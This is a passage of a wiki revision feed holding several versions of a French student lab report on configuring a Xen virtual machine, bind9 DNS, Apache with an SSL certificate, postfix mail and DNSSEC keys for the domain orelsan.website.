         IN NS ns6.gandi.net.&lt;br /&gt;
         IN A       193.48.57.181&lt;br /&gt;
         IN MX      100 dns&lt;br /&gt;
&lt;br /&gt;
dns     IN A       193.48.57.181&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour prendre en compte les paramètres changés dans les fichiers ci-dessous, il suffit d'effectuer les commandes:&lt;br /&gt;
&amp;lt;pre&amp;gt;service bind9 stop&lt;br /&gt;
service bind9 start&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour observer le bon fonctionnement de notre serveur, on peut visualiser les informations sur&lt;br /&gt;
&lt;br /&gt;
&amp;lt;i&amp;gt;cat /var/log/daemon.log&amp;lt;/i&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis un ping de notre page internet peut nous montrer également son bon fonctionnement&lt;br /&gt;
Si tout cela fonctionne on peut se rendre sur notre page.&lt;br /&gt;
Pour modifier les informations visible sur la page, il suffit d'aller dans &lt;br /&gt;
&amp;lt;i&amp;gt;/var/www/html/index.html&amp;lt;/i&amp;gt;. Toutes les informations écrites dans ce fichier seront visible sur notre page.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;b&amp;gt;Installation boite mail&amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On commence par un installer postfix qui est un serveur de messagerie électronique.&lt;br /&gt;
&amp;lt;pre&amp;gt;apt-get install postfix&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois postfix installé, on indique le nom de domaine (orelsan.website) dans la configuration&lt;br /&gt;
&lt;br /&gt;
Dans &amp;lt;i&amp;gt;/etc/aliases&amp;lt;/i&amp;gt; on ajoute:&lt;br /&gt;
&amp;lt;pre&amp;gt;admin:root&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis on utilise la commande&lt;br /&gt;
&amp;lt;pre&amp;gt;newaliases&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On installe également bsd-mailx qui est un agent de courriel utilisateur simple.&lt;br /&gt;
&amp;lt;pre&amp;gt;apt-get install bsd-mailx&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Et pour observer nos mail, on tape la commande &amp;lt;i&amp;gt;mail&amp;lt;/i&amp;gt; dans la console.&lt;br /&gt;
L'adresse mail est admin@orelsan.website.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;b&amp;gt;Générer une demande de certificat en SHA 2&amp;lt;/b&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;openssl req -nodes -newkey rsa:2048 -sha256 -keyout monserveur.key -out serveur.csr&lt;br /&gt;
&lt;br /&gt;
Country Name (2 letter code) [AU]:fr&lt;br /&gt;
State or Province Name (full name) [Some-State]:North&lt;br /&gt;
Locality Name (eg, city) []:Lille&lt;br /&gt;
Organization Name (eg, company) [Internet Widgits Pty Ltd]:Polytech&lt;br /&gt;
Organizational Unit Name (eg, section) []:IMA&lt;br /&gt;
Common Name (e.g. server FQDN or YOUR name) []:orelsan.website&lt;br /&gt;
Email Address []:admin@orelsan.website&lt;br /&gt;
&lt;br /&gt;
Please enter the following 'extra' attributes&lt;br /&gt;
to be sent with your certificate request&lt;br /&gt;
A challenge password []:&lt;br /&gt;
An optional company name []:&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Cette fonction nous crée 2 fichiers :&lt;br /&gt;
monserveur.key	serveur.csr&lt;br /&gt;
&lt;br /&gt;
-monserveur.key contient la clé privée.&lt;br /&gt;
&lt;br /&gt;
-serveur.csr contient la clé public.&lt;br /&gt;
&lt;br /&gt;
On va maintenant ajouter la clé public sur gandi pour qu'il nous génère un certificat.&lt;br /&gt;
On crée 2 fichier avec :&lt;br /&gt;
&lt;br /&gt;
-inter.crt qui contient le certificat intermédiaire.&lt;br /&gt;
&lt;br /&gt;
-gandi.crt qui qui contient le certificat .&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Orelsan:~# ls&lt;br /&gt;
gandi.crt  inter.crt  mbox  monserveur.key  serveur.csr&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans le fichier &amp;lt;i&amp;gt;/etc/apache2/sites-enabled/000-default.conf&amp;lt;/i&amp;gt; on écrit: &lt;br /&gt;
&amp;lt;pre&amp;gt;&amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
&lt;br /&gt;
        ServerName www.orelsan.website&lt;br /&gt;
        ServerAlias orelsan.website&lt;br /&gt;
        DocumentRoot /var/www/html&lt;br /&gt;
        CustomLog /var/log/apache2/secure_access.log combined&lt;br /&gt;
&lt;br /&gt;
        SSLEngine on&lt;br /&gt;
	SLCertificateFile /root/gandi.crt&lt;br /&gt;
        SSLCertificateKeyFile /root/monserveur.key&lt;br /&gt;
        SSLCertificateChainFile /root/inter.crt&lt;br /&gt;
	SSLVerifyClient None&lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;b&amp;gt; DNSSEC &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous ajoutons l'option ci dessous dans le fichier &amp;lt;i&amp;gt;named.conf.options&amp;lt;/i&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;dnssec-enable yes &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans un répertoire, nous créons d'abord la clé asymétriqu de signature puis celle de zone :&lt;br /&gt;
&amp;lt;pre&amp;gt;dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE orelsan.website &lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE orelsan.website&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Jturut</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&amp;diff=35637</id>
		<title>TP sysres IMA2a5 2016/2017 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&amp;diff=35637"/>
				<updated>2016-12-05T17:18:05Z</updated>
		
		<summary type="html">&lt;p&gt;Jturut : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{| class=&amp;quot;wikitable centre&amp;quot; width=&amp;quot;100%&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! scope=col | N° VLAN&lt;br /&gt;
! scope=col | Prénom&lt;br /&gt;
! scope=col | Réseau local&lt;br /&gt;
! scope=col | Nom VM&lt;br /&gt;
! scope=col | @IP VM &lt;br /&gt;
|-&lt;br /&gt;
| VLAN20        &lt;br /&gt;
| Dimitri          &lt;br /&gt;
| 10.60.20.0/24&lt;br /&gt;
| Vald&lt;br /&gt;
|193.48.57.182/28&lt;br /&gt;
|-&lt;br /&gt;
|VLAN21           &lt;br /&gt;
| Nabil         &lt;br /&gt;
| 10.60.21.0/24&lt;br /&gt;
| Pnl&lt;br /&gt;
|193.48.57.177/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN22&lt;br /&gt;
| Otmane              &lt;br /&gt;
| 10.60.22.0/24&lt;br /&gt;
| Lartiste&lt;br /&gt;
| 193.48.57.178/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN23  &lt;br /&gt;
| Hugo               &lt;br /&gt;
| 10.60.23.0/24 &lt;br /&gt;
| Gradur&lt;br /&gt;
| 193.48.57.179/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN24 &lt;br /&gt;
| Clement              &lt;br /&gt;
| 10.60.24.0/24 &lt;br /&gt;
| Gringe&lt;br /&gt;
| 193.48.57.180/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN25   &lt;br /&gt;
| Joan            &lt;br /&gt;
| 10.60.25.0/24 &lt;br /&gt;
| Orelsan&lt;br /&gt;
| 193.48.57.181/28&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Configuration du point d'accés Cisco ==&lt;br /&gt;
&lt;br /&gt;
== Installation d'une machine virtuelle ==&lt;br /&gt;
L'installation s'effectuée à l'aide du logiciel de virtualisation Xen. Nous possédons qu'un seul serveur pour 6. C'est pour cela qu'on passe par la création d'une machine virtuel pour que chacun puisse réaliser une serveur DNS, Apache sur sa machine virtuel.&lt;br /&gt;
Pour créer la machine virtuel, on tape la commande suivante :&lt;br /&gt;
&amp;lt;pre&amp;gt; xen-create-image --hostname Orelsan --ip 193.48.57.181 --netmask 255.255.255.240 --dir /usr/local/xen&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Entre deux séances de TP, nous avons eu un changement de version du kernel Linux. De ce fait il a fallu modifier le fichier &amp;lt;i&amp;gt;orelsan.cfg&amp;lt;/i&amp;gt; en remplaçant la version 3.14 en 3.16.0 &lt;br /&gt;
&amp;lt;pre&amp;gt; kernel      = '/boot/vmlinuz-3.16.0-4-amd64'&lt;br /&gt;
 extra       = 'elevator=noop'&lt;br /&gt;
 ramdisk     = '/boot/initrd.img-3.16.0-4-amd64'&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Lancement de notre machine virtuelle &lt;br /&gt;
&amp;lt;pre&amp;gt; xl create Orelsan.cvg &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Connection à notre machine virtuelle&lt;br /&gt;
&amp;lt;pre&amp;gt; xl console Orelsan &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On peut également voir la liste de toutes les machines virtuelles ouvertes avec :&lt;br /&gt;
&amp;lt;pre&amp;gt; xl list &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois la connexion sur notre machine établie, nous devons changer le fichier &amp;lt;i&amp;gt;interfaces&amp;lt;/i&amp;gt; pour permettre une connexion à internet:&lt;br /&gt;
&amp;lt;pre&amp;gt;# The loopback network interface&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
# The primary network interface&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
        address 193.48.57.181&lt;br /&gt;
        netmask 255.255.255.240&lt;br /&gt;
        gateway 193.48.57.190&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis pour prendre en compte ses modifications nous utilisons :&lt;br /&gt;
&amp;lt;pre&amp;gt;ifdown&lt;br /&gt;
ifup&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Après un reboot de notre machine virtuelle, nous pouvons ainsi installer différents packages comme :&lt;br /&gt;
&amp;lt;pre&amp;gt; apt-get install vim &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration du service internet ==&lt;br /&gt;
Pour cela, il nous faut réaliser un serveur DNS qui permet de lier un nom de domaine à une adresse IP. Ainsi qu'un serveur Apache qui est un serveur HTTP&lt;br /&gt;
&lt;br /&gt;
&amp;lt;b&amp;gt; Installation du serveur HTTP &amp;lt;/b&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; apt-get install apache2 &amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;b&amp;gt; Installation du serveur DNS &amp;lt;/b&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; apt-get install bind9 &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Si cette installation vous indique une erreur, il faut modifier le fichier  &amp;lt;i&amp;gt;/etc/apt/apt.conf.d/01proxy&amp;lt;/i&amp;gt;&lt;br /&gt;
et remplacer &lt;br /&gt;
&amp;lt;pre&amp;gt; Acquire::http::Proxy &amp;quot;http://proxy.polytech-lille.fr:3128&amp;quot;; &amp;lt;/pre&amp;gt;&lt;br /&gt;
par&lt;br /&gt;
&amp;lt;pre&amp;gt; Acquire::http::Proxy &amp;quot;http://helfaut.escaut.net:3128&amp;quot;; &amp;lt;/pre&amp;gt;&lt;br /&gt;
Cette modification est du a la modification du proxy de l'école.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;b&amp;gt;Configuration de notre nom de domaine&amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Après l'achat de notre nom de domaine &amp;lt;i&amp;gt;orelsan.website&amp;lt;/i&amp;gt; sur www.gandi.net on vient modifier le glue records pour lier notre adresse IP au nom de domaine&lt;br /&gt;
dns.orelsan.webiste -&amp;gt; 193.48.57.181&lt;br /&gt;
Ensuite on se rend dans l'onglet modifier les DNS et on change le DNS indiquer par celui vu juste précédemment.&lt;br /&gt;
Puis nous allons modifier 3 fichiers :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;i&amp;gt;/etc/bind/named.conf.options&amp;lt;/i&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;options {&lt;br /&gt;
   allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
acl &amp;quot;allowed_to_transfer&amp;quot; {&lt;br /&gt;
   217.70.177.40/32 ; //passerelle de gandi  par defaut&lt;br /&gt;
 };&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;i&amp;gt;/etc/bind/named.conf.local &amp;lt;/i&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;//&lt;br /&gt;
// Do any local configuration here&lt;br /&gt;
//&lt;br /&gt;
&lt;br /&gt;
// Consider adding the 1918 zones here, if they are not used in your&lt;br /&gt;
// organization&lt;br /&gt;
//include &amp;quot;/etc/bind/zones.rfc1918&amp;quot;;&lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;orelsan.website&amp;quot; {&lt;br /&gt;
   type master;&lt;br /&gt;
   file &amp;quot;/etc/bind/orelsan.website/orelsan&amp;quot;;&lt;br /&gt;
 };&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;i&amp;gt;/etc/bind/orelsan.website/orelsan&amp;lt;/i&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;$TTL 259200&lt;br /&gt;
@ IN SOA dns postmaster.orelsan.website. (&lt;br /&gt;
        20               ; Version&lt;br /&gt;
        7200             ; Refresh (2h)&lt;br /&gt;
        3600             ; Retry   (1h)&lt;br /&gt;
        1209600          ; Expire (14j)&lt;br /&gt;
        259200 )         ; Minimum TTL (3j)&lt;br /&gt;
         IN NS dns&lt;br /&gt;
         IN NS ns6.gandi.net.&lt;br /&gt;
         IN A       193.48.57.181&lt;br /&gt;
         IN MX      100 dns&lt;br /&gt;
&lt;br /&gt;
dns     IN A       193.48.57.181&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour prendre en compte les paramètres changés dans les fichiers ci-dessous, il suffit d'effectuer les commandes:&lt;br /&gt;
&amp;lt;pre&amp;gt;service bind9 stop&lt;br /&gt;
service bind9 start&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour observer le bon fonctionnement de notre serveur, on peut visualiser les informations sur&lt;br /&gt;
&lt;br /&gt;
&amp;lt;i&amp;gt;cat /var/log/daemon.log&amp;lt;/i&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis un ping de notre page internet peut nous montrer également son bon fonctionnement&lt;br /&gt;
Si tout cela fonctionne on peut se rendre sur notre page.&lt;br /&gt;
Pour modifier les informations visible sur la page, il suffit d'aller dans &lt;br /&gt;
&amp;lt;i&amp;gt;/var/www/html/index.html&amp;lt;/i&amp;gt;. Toutes les informations écrites dans ce fichier seront visible sur notre page.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;b&amp;gt;Installation boite mail&amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On commence par un installer postfix qui est un serveur de messagerie électronique.&lt;br /&gt;
&amp;lt;pre&amp;gt;apt-get install postfix&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois postfix installé, on indique le nom de domaine (orelsan.website) dans la configuration&lt;br /&gt;
&lt;br /&gt;
Dans &amp;lt;i&amp;gt;/etc/aliases&amp;lt;/i&amp;gt; on ajoute:&lt;br /&gt;
&amp;lt;pre&amp;gt;admin:root&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis on utilise la commande&lt;br /&gt;
&amp;lt;pre&amp;gt;newaliases&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On installe également bsd-mailx qui est un agent de courriel utilisateur simple.&lt;br /&gt;
&amp;lt;pre&amp;gt;apt-get install bsd-mailx&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Et pour observer nos mail, on tape la commande &amp;lt;i&amp;gt;mail&amp;lt;/i&amp;gt; dans la console.&lt;br /&gt;
L'adresse mail est admin@orelsan.website.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;b&amp;gt;Générer une demande de certificat en SHA 2&amp;lt;/b&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;openssl req -nodes -newkey rsa:2048 -sha256 -keyout monserveur.key -out serveur.csr&lt;br /&gt;
&lt;br /&gt;
Country Name (2 letter code) [AU]:fr&lt;br /&gt;
State or Province Name (full name) [Some-State]:North&lt;br /&gt;
Locality Name (eg, city) []:Lille&lt;br /&gt;
Organization Name (eg, company) [Internet Widgits Pty Ltd]:Polytech&lt;br /&gt;
Organizational Unit Name (eg, section) []:IMA&lt;br /&gt;
Common Name (e.g. server FQDN or YOUR name) []:orelsan.website&lt;br /&gt;
Email Address []:admin@orelsan.website&lt;br /&gt;
&lt;br /&gt;
Please enter the following 'extra' attributes&lt;br /&gt;
to be sent with your certificate request&lt;br /&gt;
A challenge password []:&lt;br /&gt;
An optional company name []:&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Cette fonction nous crée 2 fichiers :&lt;br /&gt;
monserveur.key	serveur.csr&lt;br /&gt;
&lt;br /&gt;
-monserveur.key contient la clé privée.&lt;br /&gt;
&lt;br /&gt;
-serveur.csr contient la clé public.&lt;br /&gt;
&lt;br /&gt;
On va maintenant ajouter la clé public sur gandi pour qu'il nous génère un certificat.&lt;br /&gt;
On crée 2 fichier avec :&lt;br /&gt;
&lt;br /&gt;
-inter.crt qui contient le certificat intermédiaire.&lt;br /&gt;
&lt;br /&gt;
-gandi.crt qui qui contient le certificat .&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Orelsan:~# ls&lt;br /&gt;
gandi.crt  inter.crt  mbox  monserveur.key  serveur.csr&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans le fichier &amp;lt;i&amp;gt;/etc/apache2/sites-enabled/000-default.conf&amp;lt;/i&amp;gt; on écrit: &lt;br /&gt;
&amp;lt;pre&amp;gt;&amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
&lt;br /&gt;
        ServerName www.orelsan.website&lt;br /&gt;
        ServerAlias orelsan.website&lt;br /&gt;
        DocumentRoot /var/www/html&lt;br /&gt;
        CustomLog /var/log/apache2/secure_access.log combined&lt;br /&gt;
&lt;br /&gt;
        SSLEngine on&lt;br /&gt;
	SLCertificateFile /root/gandi.crt&lt;br /&gt;
        SSLCertificateKeyFile /root/monserveur.key&lt;br /&gt;
        SSLCertificateChainFile /root/inter.crt&lt;br /&gt;
	SSLVerifyClient None&lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Jturut</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&amp;diff=35636</id>
		<title>TP sysres IMA2a5 2016/2017 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&amp;diff=35636"/>
				<updated>2016-12-05T16:48:09Z</updated>
		
		<summary type="html">&lt;p&gt;Jturut : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{| class=&amp;quot;wikitable centre&amp;quot; width=&amp;quot;100%&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! scope=col | N° VLAN&lt;br /&gt;
! scope=col | Prénom&lt;br /&gt;
! scope=col | Réseau local&lt;br /&gt;
! scope=col | Nom VM&lt;br /&gt;
! scope=col | @IP VM &lt;br /&gt;
|-&lt;br /&gt;
| VLAN20        &lt;br /&gt;
| Dimitri          &lt;br /&gt;
| 10.60.20.0/24&lt;br /&gt;
| Vald&lt;br /&gt;
|193.48.57.182/28&lt;br /&gt;
|-&lt;br /&gt;
|VLAN21           &lt;br /&gt;
| Nabil         &lt;br /&gt;
| 10.60.21.0/24&lt;br /&gt;
| Pnl&lt;br /&gt;
|193.48.57.177/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN22&lt;br /&gt;
| Otmane              &lt;br /&gt;
| 10.60.22.0/24&lt;br /&gt;
| Lartiste&lt;br /&gt;
| 193.48.57.178/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN23  &lt;br /&gt;
| Hugo               &lt;br /&gt;
| 10.60.23.0/24 &lt;br /&gt;
| Gradur&lt;br /&gt;
| 193.48.57.179/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN24 &lt;br /&gt;
| Clement              &lt;br /&gt;
| 10.60.24.0/24 &lt;br /&gt;
| Gringe&lt;br /&gt;
| 193.48.57.180/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN25   &lt;br /&gt;
| Joan            &lt;br /&gt;
| 10.60.25.0/24 &lt;br /&gt;
| Orelsan&lt;br /&gt;
| 193.48.57.181/28&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Configuration du point d'accés Cisco ==&lt;br /&gt;
&lt;br /&gt;
== Installation d'une machine virtuelle ==&lt;br /&gt;
L'installation s'effectuée à l'aide du logiciel de virtualisation Xen. Nous possédons qu'un seul serveur pour 6. C'est pour cela qu'on passe par la création d'une machine virtuel pour que chacun puisse réaliser une serveur DNS, Apache sur sa machine virtuel.&lt;br /&gt;
Pour créer la machine virtuel, on tape la commande suivante :&lt;br /&gt;
&amp;lt;pre&amp;gt; xen-create-image --hostname Orelsan --ip 193.48.57.181 --netmask 255.255.255.240 --dir /usr/local/xen&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Entre deux séances de TP, nous avons eu un changement de version du kernel Linux. De ce fait il a fallu modifier le fichier &amp;lt;i&amp;gt;orelsan.cfg&amp;lt;/i&amp;gt; en remplaçant la version 3.14 en 3.16.0 &lt;br /&gt;
&amp;lt;pre&amp;gt; kernel      = '/boot/vmlinuz-3.16.0-4-amd64'&lt;br /&gt;
 extra       = 'elevator=noop'&lt;br /&gt;
 ramdisk     = '/boot/initrd.img-3.16.0-4-amd64'&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Lancement de notre machine virtuelle &lt;br /&gt;
&amp;lt;pre&amp;gt; xl create Orelsan.cvg &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Connection à notre machine virtuelle&lt;br /&gt;
&amp;lt;pre&amp;gt; xl console Orelsan &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On peut également voir la liste de toutes les machines virtuelles ouvertes avec :&lt;br /&gt;
&amp;lt;pre&amp;gt; xl list &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois la connexion sur notre machine établie, nous devons changer le fichier &amp;lt;i&amp;gt;interfaces&amp;lt;/i&amp;gt; pour permettre une connexion à internet:&lt;br /&gt;
&amp;lt;pre&amp;gt;# The loopback network interface&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
# The primary network interface&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
        address 193.48.57.181&lt;br /&gt;
        netmask 255.255.255.240&lt;br /&gt;
        gateway 193.48.57.190&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis pour prendre en compte ses modifications nous utilisons :&lt;br /&gt;
&amp;lt;pre&amp;gt;ifdown&lt;br /&gt;
ifup&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Après un reboot de notre machine virtuelle, nous pouvons ainsi installer différents packages comme :&lt;br /&gt;
&amp;lt;pre&amp;gt; apt-get install vim &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration du service internet ==&lt;br /&gt;
Pour cela, il nous faut réaliser un serveur DNS qui permet de lier un nom de domaine à une adresse IP. Ainsi qu'un serveur Apache qui est un serveur HTTP&lt;br /&gt;
&lt;br /&gt;
&amp;lt;b&amp;gt; Installation du serveur HTTP &amp;lt;/b&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; apt-get install apache2 &amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;b&amp;gt; Installation du serveur DNS &amp;lt;/b&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; apt-get install bind9 &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Si cette installation vous indique une erreur, il faut modifier le fichier  &amp;lt;i&amp;gt;/etc/apt/apt.conf.d/01proxy&amp;lt;/i&amp;gt;&lt;br /&gt;
et remplacer &lt;br /&gt;
&amp;lt;pre&amp;gt; Acquire::http::Proxy &amp;quot;http://proxy.polytech-lille.fr:3128&amp;quot;; &amp;lt;/pre&amp;gt;&lt;br /&gt;
par&lt;br /&gt;
&amp;lt;pre&amp;gt; Acquire::http::Proxy &amp;quot;http://helfaut.escaut.net:3128&amp;quot;; &amp;lt;/pre&amp;gt;&lt;br /&gt;
Cette modification est du a la modification du proxy de l'école.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;b&amp;gt;Configuration de notre nom de domaine&amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Après l'achat de notre nom de domaine &amp;lt;i&amp;gt;orelsan.website&amp;lt;/i&amp;gt; sur www.gandi.net on vient modifier le glue records pour lier notre adresse IP au nom de domaine&lt;br /&gt;
dns.orelsan.webiste -&amp;gt; 193.48.57.181&lt;br /&gt;
Ensuite on se rend dans l'onglet modifier les DNS et on change le DNS indiquer par celui vu juste précédemment.&lt;br /&gt;
Puis nous allons modifier 3 fichiers :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;i&amp;gt;/etc/bind/named.conf.options&amp;lt;/i&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;options {&lt;br /&gt;
   allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
acl &amp;quot;allowed_to_transfer&amp;quot; {&lt;br /&gt;
   217.70.177.40/32 ; //passerelle de gandi  par defaut&lt;br /&gt;
 };&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;i&amp;gt;/etc/bind/named.conf.local &amp;lt;/i&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;//&lt;br /&gt;
// Do any local configuration here&lt;br /&gt;
//&lt;br /&gt;
&lt;br /&gt;
// Consider adding the 1918 zones here, if they are not used in your&lt;br /&gt;
// organization&lt;br /&gt;
//include &amp;quot;/etc/bind/zones.rfc1918&amp;quot;;&lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;orelsan.website&amp;quot; {&lt;br /&gt;
   type master;&lt;br /&gt;
   file &amp;quot;/etc/bind/orelsan.website/orelsan&amp;quot;;&lt;br /&gt;
 };&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;i&amp;gt;/etc/bind/orelsan.website/orelsan&amp;lt;/i&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;$TTL 259200&lt;br /&gt;
@ IN SOA dns postmaster.orelsan.website. (&lt;br /&gt;
        20               ; Version&lt;br /&gt;
        7200             ; Refresh (2h)&lt;br /&gt;
        3600             ; Retry   (1h)&lt;br /&gt;
        1209600          ; Expire (14j)&lt;br /&gt;
        259200 )         ; Minimum TTL (3j)&lt;br /&gt;
         IN NS dns&lt;br /&gt;
         IN NS ns6.gandi.net.&lt;br /&gt;
         IN A       193.48.57.181&lt;br /&gt;
         IN MX      100 dns&lt;br /&gt;
&lt;br /&gt;
dns     IN A       193.48.57.181&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour prendre en compte les paramètres changés dans les fichiers ci-dessous, il suffit d'effectuer les commandes:&lt;br /&gt;
&amp;lt;pre&amp;gt;service bind9 stop&lt;br /&gt;
service bind9 start&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour observer le bon fonctionnement de notre serveur, on peut visualiser les informations sur&lt;br /&gt;
&lt;br /&gt;
&amp;lt;i&amp;gt;cat /var/log/daemon.log&amp;lt;/i&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis un ping de notre page internet peut nous montrer également son bon fonctionnement&lt;br /&gt;
Si tout cela fonctionne on peut se rendre sur notre page.&lt;br /&gt;
Pour modifier les informations visible sur la page, il suffit d'aller dans &lt;br /&gt;
&amp;lt;i&amp;gt;/var/www/html/index.html&amp;lt;/i&amp;gt;. Toutes les informations écrites dans ce fichier seront visible sur notre page.&lt;br /&gt;
&lt;br /&gt;
